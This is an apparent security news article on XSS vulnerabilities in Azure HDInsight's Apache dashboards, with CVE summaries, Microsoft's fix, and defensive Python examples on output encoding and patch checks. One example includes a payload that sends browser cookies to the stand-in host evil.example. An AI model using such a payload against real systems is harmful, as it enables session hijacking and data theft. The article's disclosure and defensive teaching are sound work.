Cloud security firm Orca Security has disclosed a series of cross-site scripting (XSS) vulnerabilities in Azure HDInsight. Because the affected pages are the management and monitoring dashboards of the cluster, a successful attack runs attacker-controlled JavaScript in the browser of an administrator or analyst, which is enough to hijack that user's session, read data the dashboards expose, and perform actions with the victim's privileges. The flaws affect several Apache services deployed by HDInsight, including Hadoop, Spark, Kafka, and Oozie. Azure HDInsight is Microsoft's managed analytics service for running open-source big-data frameworks inside an Azure environment; the service itself is not open source, but the components it deploys are. This article summarizes what the vulnerabilities are, what they allow, and what was done to fix them.
The Vulnerabilities
Orca Security's investigation found eight XSS vulnerabilities across the Azure HDInsight platform, tracked under five CVE identifiers: CVE-2023-36881, CVE-2023-35394, CVE-2023-38188, CVE-2023-35393, and CVE-2023-36877. The researchers found them by tampering with request parameters and user-controlled configuration values that the web UIs reflect back into their pages. None of the affected components validated those values on the way in, and, more importantly, none encoded them on the way out: the injected markup was rendered as-is when the dashboard loaded. Input validation is a useful defense in depth, but the control that actually prevents this bug class is context-aware output encoding at the point where the value is written into HTML.
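The following added example (written for this article, not code from Orca Security or from any of the affected Apache projects) shows the two shapes of the bug described above: a stored value (here a hypothetical YARN queue name) and a reflected query parameter (a hypothetical `filter` parameter) interpolated into a dashboard row with no output encoding, beside the same rendering with HTML encoding applied. The attacker payload and the dashboard markup are constructed for illustration.

```python
import html
from urllib.parse import parse_qs

# Constructed attacker value: something a user could save through a config UI
# (a stored XSS shape) or pass in a URL (a reflected XSS shape). The payload
# exfiltrates the victim's cookies to an attacker-controlled host (hypothetical).
ATTACKER_VALUE = "<img src=x onerror=\"fetch('https://evil.example/?c='+document.cookie)\">"


def render_queue_row_vulnerable(queue_name: str) -> str:
    """Writes the value straight into HTML: the bug class on this page."""
    return f"<tr><td class='queue'>{queue_name}</td></tr>"


def render_queue_row_safe(queue_name: str) -> str:
    """Encodes for the HTML text/attribute context before interpolation.

    html.escape with quote=True turns < > & " ' into entities, so the browser
    shows the attacker's string as text instead of parsing it as markup.
    """
    return f"<tr><td class='queue'>{html.escape(queue_name, quote=True)}</td></tr>"


def render_filter_page(query_string: str, safe: bool) -> str:
    """Simulates a dashboard that reflects a ?filter= query parameter.

    parse_qs URL-decodes the value, so percent-encoding in the request does
    not protect the page; only output encoding at render time does.
    """
    value = parse_qs(query_string).get("filter", [""])[0]
    row = render_queue_row_safe(value) if safe else render_queue_row_vulnerable(value)
    return f"<html><body><table>{row}</table></body></html>"


def payload_survives(page_html: str, attacker_value: str) -> bool:
    """Crude detection check: does the attacker's raw markup reach the page?"""
    return attacker_value in page_html


if __name__ == "__main__":
    for safe in (False, True):
        page = render_filter_page("filter=" + ATTACKER_VALUE, safe=safe)
        print("safe" if safe else "vulnerable", "->", "payload executes" if payload_survives(page, ATTACKER_VALUE) else "payload neutralized")
```

The same check is a reasonable smoke test against a real dashboard: submit a harmless marker such as `<b>marker</b>` through each user-controlled field or parameter and search the served HTML for it unencoded. Note that `html.escape` is correct only for HTML text and quoted-attribute contexts; a value written into a `<script>` block, an event-handler attribute, or a URL needs the encoder for that context instead.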
CVE-2023-36881: Apache Ambari Background Operations
The first issue, CVE-2023-36881, is in Apache Ambari's Background Operations view, where several default parameters could be altered to inject script. The same CVE covers the Ambari Managed Notifications component and the Ambari YARN Queue Manager: an attacker could plant a payload in alert notifications, tamper with the access-control settings, or inject JavaScript into specific YARN queue configurations. Because Ambari is the cluster administration console, a stored payload in any of these places is served to the administrators who review it, which is the highest-value target an XSS in this ecosystem can hit.
CVE-2023-35394: Azure HDInsight’s Jupyter Notebook Service
CVE-2023-35394 is an XSS vulnerability in Azure HDInsight's Jupyter Notebook service. Jupyter relies on Google's Caja sanitizer to strip active content from notebook output, and the flaw bypassed that sanitization, so a crafted notebook could run attacker-controlled JavaScript in the browser of anyone who opened it. The execution is in the viewer's browser, with that user's Jupyter session, rather than on the cluster itself.
CVE-2023-38188: Apache Hadoop ResourceManager UI
Within Azure HDInsight, the Apache Hadoop ResourceManager UI was vulnerable to XSS through manipulation of the container endpoint and port values it renders, tracked as CVE-2023-38188.
CVE-2023-35393: Apache Hive 2
Apache Hive 2 as deployed in Azure HDInsight was vulnerable to XSS through the same kind of container endpoint manipulation, tracked as CVE-2023-35393.
CVE-2023-36877: Apache Oozie Web Console
CVE-2023-36877 is an XSS vulnerability in the Apache Oozie Web Console, triggered by manipulating the console's filter parameter.
Remedial Actions and Microsoft’s Response
Orca Security reported all of the vulnerabilities to Microsoft, and Microsoft released fixes for Azure HDInsight as part of the August 2023 Patch Tuesday updates. One practical caveat for operators: HDInsight delivers component fixes through new cluster images rather than by patching running clusters in place, so a cluster created before the update continues to run the vulnerable dashboards until it is recreated on the patched image. Teams should check the creation date and image version of existing clusters rather than assume the Patch Tuesday release reached them.
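As an added example (not from Orca Security or Microsoft), the check below takes the JSON output of `az hdinsight list` and flags clusters created before the fix became available. The field names `name`, `properties.clusterVersion` and `properties.createdDate` are assumed to match the Azure CLI output, the cutoff date is an assumption based on the August 2023 Patch Tuesday, and the cluster records are constructed sample data.

```python
import json
import sys
from datetime import datetime, timezone

# Assumption: images carrying the fix date from the August 2023 Patch Tuesday.
# Adjust if your subscription's rollout date differs.
FIX_AVAILABLE_FROM = datetime(2023, 8, 8, tzinfo=timezone.utc)

# Constructed sample in the assumed shape of `az hdinsight list -o json`.
SAMPLE_AZ_OUTPUT = json.dumps([
    {"name": "hdi-prod-spark",
     "properties": {"clusterVersion": "5.0.3000.1",
                    "createdDate": "2023-05-11T09:14:02.313Z"}},
    {"name": "hdi-analytics-2",
     "properties": {"clusterVersion": "5.0.3000.1",
                    "createdDate": "2023-09-02T17:40:55.100Z"}},
])


def parse_created(ts: str) -> datetime:
    """Parse Azure's ISO-8601 timestamp (trailing Z) into an aware datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def clusters_needing_recreate(az_json: str,
                              fixed_from: datetime = FIX_AVAILABLE_FROM) -> list:
    """Return names of clusters created before the fix was available.

    A cluster created before that date keeps the pre-fix dashboards even if
    later Patch Tuesdays have passed, because the fix ships in new images.
    """
    stale = []
    for cluster in json.loads(az_json):
        props = cluster["properties"]
        created = parse_created(props["createdDate"])
        if created < fixed_from:
            stale.append(cluster["name"])
    return stale


if __name__ == "__main__":
    # Usage: az hdinsight list -o json | python check_hdinsight.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_AZ_OUTPUT
    for name in clusters_needing_recreate(data):
        print(f"{name}: created before fix date, recreate on a patched image")
```

Pipe the real inventory in with `az hdinsight list -o json | python check_hdinsight.py`; when run without stdin it uses the constructed sample and flags `hdi-prod-spark`.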
Conclusion
These eight XSS vulnerabilities are a reminder that the management UIs of managed big-data platforms are web applications like any other, and that the users they serve, cluster administrators and data engineers, are exactly the accounts an attacker wants to impersonate. The fix on the vendor side is output encoding at every point where user-controlled data reaches a page; the fix on the customer side is to confirm that running clusters actually carry the patched images. Orca Security's research and Microsoft's response show the coordinated-disclosure process working as intended, but the responsibility for verifying the fix in a given environment still rests with the team operating it.